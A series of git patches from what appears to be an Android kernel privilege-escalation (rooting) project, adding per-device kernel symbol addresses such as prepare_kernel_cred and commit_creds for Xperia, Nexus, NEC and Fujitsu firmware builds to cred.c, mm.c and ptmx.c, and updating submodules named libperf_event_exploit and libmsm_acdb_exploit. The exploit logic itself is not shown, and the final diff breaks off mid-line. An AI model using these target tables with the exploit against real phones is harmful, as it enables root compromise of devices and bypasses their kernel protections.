supported_devices[] = { { DEVICE_LT26W_6_2_B_0_211, 0xc0b86ef0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_LT22I_6_2_A_1_100, 0xc09dbed8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, From a0b679df233015783f5a4de8d2284ba990a6ef7d Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:02:17 +0530 Subject: [PATCH 021/125] added support for Xperia Go (ST27i/a) 6.2.A.1.100 (thanks to the_laser) --- cred.c | 2 ++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 2 ++ ptmx.c | 2 ++ 5 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 03347a2..d897035 100644 --- a/cred.c +++ b/cred.c @@ -48,6 +48,8 @@ static supported_device supported_devices[] = { { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}, + { DEVICE_ST27I_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, + { DEVICE_ST27A_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index 58124a2..8639a32 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 58124a2c162664843bcbb86cd164219ed0089a2c +Subproject commit 8639a32be211430df30d12aee11390b3fd1c12f9 diff --git a/libperf_event_exploit b/libperf_event_exploit index 4666b41..7392ed2 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 4666b4184f330b0437e017a6bd168f9f84ac2b40 +Subproject commit 7392ed204145cf014e6f0e9c86426657a3afe4e3 diff --git a/mm.c b/mm.c index 4baddc2..45f87dd 100644 --- a/mm.c +++ b/mm.c @@ -34,6 +34,8 @@ static supported_device supported_devices[] = { { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT22I_6_2_A_1_100, 0xc0136358 }, + { DEVICE_ST27I_6_2_A_1_100, 0xc01366ec}, + { DEVICE_ST27A_6_2_A_1_100, 0xc01366ec}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index 10ac620..1ffb6b0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -48,6 +48,8 @@ static supported_device supported_devices[] = { { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT22I_6_2_A_1_100, 0xc09dbed8 }, + { DEVICE_ST27I_6_2_A_1_100, 0xc09b98e0}, + { DEVICE_ST27A_6_2_A_1_100, 0xc09b98e0}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, From bb9cf0c5bd9ab91679340a606230aa19d43fe985 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:04:07 +0530 Subject: [PATCH 022/125] added support for Xperia T (LT30p) 9.1.A.1.142 (thanks to the_laser) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index d897035..62e7b02 100644 --- a/cred.c +++ b/cred.c @@ -61,6 +61,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c }, + { DEVICE_LT30P_9_1_A_1_142, 0xc0094878, 0xc009439c}, { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, diff --git a/device_database b/device_database index 8639a32..4782d2f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 8639a32be211430df30d12aee11390b3fd1c12f9 +Subproject commit 4782d2f33aceb73feaeeae69bfcf1b10101cee88 diff --git a/libperf_event_exploit b/libperf_event_exploit index 7392ed2..1499dff 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 7392ed204145cf014e6f0e9c86426657a3afe4e3 +Subproject commit 1499dff24dddea8036d757a60f7bd707e50afb3f diff --git a/mm.c b/mm.c index 45f87dd..5f6a477 100644 --- a/mm.c +++ b/mm.c @@ -47,6 +47,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, + { DEVICE_LT30P_9_1_A_1_142, 0xc01096e4 }, { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, { DEVICE_N05E_A1000311, 0xc0105800 }, diff --git a/ptmx.c b/ptmx.c index 1ffb6b0..0b74f5c 100644 --- a/ptmx.c +++ b/ptmx.c @@ -61,6 +61,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, + { DEVICE_LT30P_9_1_A_1_142, 0xc0d02b00}, { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, From f3ca25a1d98581bee1a7c1378525742a9b8c1822 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:06:05 +0530 Subject: [PATCH 023/125] added support for Xperia V (LT25i) 9.1.A.1.140/142 (thanks to the_laser) --- cred.c | 2 ++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 2 ++ ptmx.c | 2 ++ 5 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 62e7b02..97687a4 100644 --- a/cred.c +++ b/cred.c @@ -64,6 +64,8 @@ static supported_device supported_devices[] = { { DEVICE_LT30P_9_1_A_1_142, 0xc0094878, 0xc009439c}, { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, + { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, + { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 4782d2f..53ac4e7 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 4782d2f33aceb73feaeeae69bfcf1b10101cee88 +Subproject commit 53ac4e717dd152b267b50247453642b4c6dad472 diff --git a/libperf_event_exploit b/libperf_event_exploit index 1499dff..48ed253 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 1499dff24dddea8036d757a60f7bd707e50afb3f +Subproject commit 48ed25347f6c8deca07e5a3a7410593fc52b62f0 diff --git a/mm.c b/mm.c index 5f6a477..758eb03 100644 --- a/mm.c +++ b/mm.c @@ -50,6 +50,8 @@ static supported_device supported_devices[] = { { DEVICE_LT30P_9_1_A_1_142, 0xc01096e4 }, { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, + { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, + { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 0b74f5c..a743a07 100644 --- a/ptmx.c +++ b/ptmx.c @@ -64,6 +64,8 @@ static supported_device supported_devices[] = { { DEVICE_LT30P_9_1_A_1_142, 0xc0d02b00}, { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, + { DEVICE_LT25I_9_1_A_1_140, 0xc0d032f8}, + { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 1f95f45ae8c21825b4afeeebc840ff960356d7ee Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:08:10 +0530 Subject: [PATCH 024/125] added support for Google Nexus 4 (JDQ39) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 97687a4..682f69f 100644 --- a/cred.c +++ b/cred.c @@ -67,6 +67,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, + { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/device_database b/device_database index 53ac4e7..7eccb14 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 53ac4e717dd152b267b50247453642b4c6dad472 +Subproject commit 7eccb1438d7165f9900b076291a3154bf3f63f0c diff --git a/libperf_event_exploit b/libperf_event_exploit index 48ed253..11a0b02 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 48ed25347f6c8deca07e5a3a7410593fc52b62f0 +Subproject commit 11a0b027c3ce515901861fc57e194e8eab11ebea diff --git a/mm.c b/mm.c index 758eb03..b060843 100644 --- a/mm.c +++ b/mm.c @@ -53,6 +53,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, + { DEVICE_NEXUS4_JDQ39, 0xc00f8114 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/ptmx.c b/ptmx.c index a743a07..69f475d 100644 --- a/ptmx.c +++ b/ptmx.c @@ -67,6 +67,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc0d032f8}, { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, { DEVICE_N05E_A1000311, 0xc0f58700 }, + { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 5102e7a437184b1305a1b5fbe2c05c42fca21ffd Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 24 Jun 2013 13:41:01 +0900 Subject: [PATCH 025/125] Added SOL21 9.0.F.0.226 --- device_database | 2 +- libperf_event_exploit | 2 +- ptmx.c | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 7eccb14..07b7e55 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 7eccb1438d7165f9900b076291a3154bf3f63f0c +Subproject commit 07b7e558c1dfbe67b093d5147971fa1dc820534f diff --git a/libperf_event_exploit b/libperf_event_exploit index 11a0b02..d6854cd 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 11a0b027c3ce515901861fc57e194e8eab11ebea +Subproject commit d6854cd45911ac5e996c056df7a669d37ecfd135 diff --git a/ptmx.c b/ptmx.c index 69f475d..621f8c8 100644 --- a/ptmx.c +++ b/ptmx.c @@ -37,6 +37,7 @@ static supported_device supported_devices[] = { { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, { DEVICE_SO04E_10_1_1_D_0_179, 0xc0f392d8 }, { DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 }, + { DEVICE_SOL21_9_0_F_0_226, 0xc0cffe78 }, { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, From 13600ca1908a11d5389a600e1d51e176899cabc6 Mon Sep 17 00:00:00 2001 From: cofface Date: Mon, 24 Jun 2013 14:43:51 +0800 Subject: [PATCH 026/125] added support for Galaxy Nexus (JOP40C) added support for Galaxy Nexus (JOP40C) --- mm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm.c b/mm.c index b060843..1b11e15 100644 --- a/mm.c +++ b/mm.c @@ -53,7 +53,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, - { DEVICE_NEXUS4_JDQ39, 0xc00f8114 } + { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, + { DEVICE_NEXUS_JOP40C, 0xc01350b0 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From e8fa4d306932c28978dfa717bd17f87169466b8a Mon Sep 17 00:00:00 2001 From: cofface Date: Mon, 24 Jun 2013 14:44:35 +0800 Subject: [PATCH 027/125] added support for Galaxy Nexus (JOP40C) added support for Galaxy Nexus (JOP40C) --- cred.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cred.c b/cred.c index 682f69f..77ff8f1 100644 --- a/cred.c +++ b/cred.c @@ -67,7 +67,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, - { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 } + { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, + { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 499ed9bfca77f3198d902ca5fd2c09da1cb1b8f8 Mon Sep 17 00:00:00 2001 From: cofface Date: Mon, 24 Jun 2013 15:06:35 +0800 Subject: [PATCH 028/125] add support Galaxy Nexus JOP40C add support Galaxy Nexus JOP40C --- ptmx.c | 1 + 1 file changed, 1 insertion(+) diff --git a/ptmx.c b/ptmx.c index 621f8c8..9ed9ab4 100644 --- a/ptmx.c +++ b/ptmx.c @@ -69,6 +69,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, { DEVICE_N05E_A1000311, 0xc0f58700 }, { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, + { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From c0ad3c4b156b0fcad16048df6a5599a668a38abf Mon Sep 17 00:00:00 2001 From: sj8023ld Date: Mon, 24 Jun 2013 17:17:12 +0800 Subject: [PATCH 029/125] Add C5303 12.0.1.1.257 --- cred.c | 3 +++ mm.c | 3 +++ ptmx.c | 3 +++ 3 files changed, 9 insertions(+) diff --git a/cred.c b/cred.c index 77ff8f1..fad5bdc 100644 --- a/cred.c +++ b/cred.c @@ -57,6 +57,9 @@ static supported_device supported_devices[] = { { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_C5303_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_C5306_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5303_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5302_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, + { DEVICE_M35H_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, diff --git a/mm.c b/mm.c index 1b11e15..24f21c9 100644 --- a/mm.c +++ b/mm.c @@ -43,6 +43,9 @@ static supported_device supported_devices[] = { { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, { DEVICE_C5303_12_0_A_1_284, 0xc011445c }, { DEVICE_C5306_12_0_A_1_284, 0xc011445c }, + { DEVICE_C5303_12_0_A_1_257, 0xc011445c }, + { DEVICE_C5302_12_0_A_1_257, 0xc011445c }, + { DEVICE_M35H_12_0_A_1_257, 0xc011445c }, { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, diff --git a/ptmx.c b/ptmx.c index 9ed9ab4..74aebfe 100644 --- a/ptmx.c +++ b/ptmx.c @@ -58,6 +58,9 @@ static supported_device supported_devices[] = { { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_C5303_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_C5306_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C5303_12_0_A_1_257, 0xc0e3b890 }, + { DEVICE_C5302_12_0_A_1_257, 0xc0e3b890 }, + { DEVICE_M35H_12_0_A_1_257, 0xc0e3b890 }, { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, From 2227043b5bfd4c5d48562407545a2ff89ffcef4c Mon Sep 17 00:00:00 2001 From: Stormtrooper MX Date: Mon, 24 Jun 2013 17:35:03 -0500 Subject: [PATCH 030/125] add nec-101t add support for nec-101t --- cred.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cred.c b/cred.c index fad5bdc..d3a5ff5 100644 --- a/cred.c +++ b/cred.c @@ -71,7 +71,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, - { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 } + { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, + { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From ad9c1bf615a7d5c95eaebd65f9eeefde9a3eb1b0 Mon Sep 17 00:00:00 2001 From: Stormtrooper MX Date: Mon, 24 Jun 2013 17:35:50 -0500 Subject: [PATCH 031/125] add nec-101t add support for nec-101t --- mm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm.c b/mm.c index 24f21c9..5d9ddd0 100644 --- a/mm.c +++ b/mm.c @@ -57,7 +57,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, - { DEVICE_NEXUS_JOP40C, 0xc01350b0 } + { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, + { DEVICE_NEC_101T, 0xc013cccc } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From f382304e6c0142da345ca8ca834720584acea8e7 Mon Sep 17 00:00:00 2001 From: Stormtrooper MX Date: Mon, 24 Jun 2013 17:36:39 -0500 Subject: [PATCH 032/125] add nec-101t add support for nec-101t --- ptmx.c | 1 + 1 file changed, 1 insertion(+) diff --git a/ptmx.c b/ptmx.c index 74aebfe..569b611 100644 --- a/ptmx.c +++ b/ptmx.c @@ -73,6 +73,7 @@ static supported_device supported_devices[] = { { DEVICE_N05E_A1000311, 0xc0f58700 }, { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, + { DEVICE_NEC_101T, 0xc02c6da8 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From d2c142cf25302ab8d878bbaf99b0802780ac1671 Mon Sep 17 00:00:00 2001 From: cofface Date: Wed, 26 Jun 2013 10:26:44 +0800 Subject: [PATCH 033/125] add Galaxy Nexus jz054k add Galaxy Nexus jz054k --- mm.c | 1 + 1 file changed, 1 insertion(+) diff --git a/mm.c b/mm.c index 5d9ddd0..10d82d5 100644 --- a/mm.c +++ b/mm.c @@ -59,6 +59,7 @@ static supported_device supported_devices[] = { { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, { DEVICE_NEC_101T, 0xc013cccc } + { DEVICE_NEXUS_JZO54K, 0xc013509c }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 32d48d4a48efb1b9e3abdb86d99b8e7f448e4ee3 Mon Sep 17 00:00:00 2001 From: cofface Date: Wed, 26 Jun 2013 10:27:23 +0800 Subject: [PATCH 034/125] add Galaxy Nexus jz054k add Galaxy Nexus jz054k --- ptmx.c | 1 + 1 file changed, 1 insertion(+) diff --git a/ptmx.c b/ptmx.c index 569b611..6e20acd 100644 --- a/ptmx.c +++ b/ptmx.c @@ -74,6 +74,7 @@ static supported_device supported_devices[] = { { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, { DEVICE_NEC_101T, 0xc02c6da8 }, + { DEVICE_NEXUS_JZO54K, 0xc08b3224 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 96f1a7f54ca3ad66ecb0762a3c0b748353da84f4 Mon Sep 17 00:00:00 2001 From: cofface Date: Wed, 26 Jun 2013 10:27:57 +0800 Subject: [PATCH 035/125] add Galaxy Nexus jz054k add Galaxy Nexus jz054k --- cred.c | 1 + 1 file changed, 1 insertion(+) diff --git a/cred.c b/cred.c index d3a5ff5..ade7d92 100644 --- a/cred.c +++ b/cred.c @@ -73,6 +73,7 @@ static supported_device supported_devices[] = { { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c } + { DEVICE_NEXUS_JZO54K, 0xc00cdee0, 0xc00cdba8 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 5529e41412476197a9f9aa50bd0cb6787079b904 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 26 Jun 2013 16:15:03 +0900 Subject: [PATCH 036/125] Add F05D (V08R31C and V11R40A) Add ISW11F (V25R45A and V27R47I) --- ptmx.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/ptmx.c b/ptmx.c index 569b611..3236ca0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -7,6 +7,9 @@ typedef struct _supported_device { } supported_device; static supported_device supported_devices[] = { + { DEVICE_F05D_V08R31C, 0xc07bc164 }, + { DEVICE_F05D_V11R40A, 0xc07bbf44 }, + // F10D: Fujitsu added a method in struct file_operations { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, @@ -18,6 +21,8 @@ static supported_device supported_devices[] = { { DEVICE_SC01E_LJ3, 0xc10a5a48 }, { DEVICE_SC04E_MDI, 0xc1169808 }, { DEVICE_SC04E_MF1, 0xc1169848 }, + { DEVICE_ISW11F_V25R45A, 0xc080e268 }, + { DEVICE_ISW11F_V27R47I, 0xc080e028 }, // ISW13F: Fujitsu added a method in struct file_operations { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, From e80fc8407818c5ca1205ee8875ec9a99e0111a75 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 26 Jun 2013 16:26:55 +0900 Subject: [PATCH 037/125] Sync with submodules --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 07b7e55..a3a591e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 07b7e558c1dfbe67b093d5147971fa1dc820534f +Subproject commit a3a591ee3af25ca4875c7566752d5c66d24f17ae diff --git a/libperf_event_exploit b/libperf_event_exploit index d6854cd..5dd45d1 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit d6854cd45911ac5e996c056df7a669d37ecfd135 +Subproject commit 5dd45d1f9e52a3b8d4a2ba6a36ddb84450d34660 From 6d7e989c5a579613d603a9583d7258c840465d83 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 26 Jun 2013 18:15:33 +0900 Subject: [PATCH 038/125] Fixed compiling --- cred.c | 2 +- device_database | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- mm.c | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/cred.c b/cred.c index ade7d92..997e827 100644 --- a/cred.c +++ b/cred.c @@ -72,7 +72,7 @@ static supported_device supported_devices[] = { { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, - { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c } + { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c }, { DEVICE_NEXUS_JZO54K, 0xc00cdee0, 0xc00cdba8 }, }; diff --git a/device_database b/device_database index a3a591e..fc3d39c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a3a591ee3af25ca4875c7566752d5c66d24f17ae +Subproject commit fc3d39cdb322d6f3b86b37eb9557923935a00159 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 76ee2e1..70332c2 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 76ee2e141bd75e54496adae3f01d39a82961123c +Subproject commit 70332c21f236e504ddf578657cba2d884b7f4135 diff --git a/libperf_event_exploit b/libperf_event_exploit index 5dd45d1..b4783b3 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 5dd45d1f9e52a3b8d4a2ba6a36ddb84450d34660 +Subproject commit b4783b3ab5ebba4e8619fef2daf528aaa11785b8 diff --git a/mm.c b/mm.c index 10d82d5..f5dd996 100644 --- a/mm.c +++ b/mm.c @@ -58,7 +58,7 @@ static supported_device supported_devices[] = { { DEVICE_N05E_A1000311, 0xc0105800 }, { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, - { DEVICE_NEC_101T, 0xc013cccc } + { DEVICE_NEC_101T, 0xc013cccc }, { DEVICE_NEXUS_JZO54K, 0xc013509c }, }; From 0b2f3d41d3d89e94420ad65120f0b1f04cffe25d Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 27 Jun 2013 11:15:40 +0900 Subject: [PATCH 039/125] Move all symbol addresses into device_database library --- cred.c | 83 +++--------------------------------------- device_database | 2 +- mm.c | 73 ++----------------------------------- ptmx.c | 97 ++----------------------------------------------- 4 files changed, 13 insertions(+), 242 deletions(-) diff --git a/cred.c b/cred.c index 997e827..604f289 100644 --- a/cred.c +++ b/cred.c @@ -15,87 +15,14 @@ #include "libperf_event_exploit/perf_event.h" #include "device_database/device_database.h" -typedef struct _supported_device { - device_id_t device_id; - unsigned long int prepare_kernel_cred_address; - unsigned long int commit_creds_address; -} supported_device; - -static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, - { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, - { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, - { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, - { DEVICE_SGP321_10_1_1_A_1_307, 0xc0094124, 0xc0093c48 }, - { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, - { DEVICE_SGP311_10_1_C_0_370, 0xc009363c, 0xc0093160 }, - { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, - { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, - { DEVICE_SO01E_9_1_C_0_473, 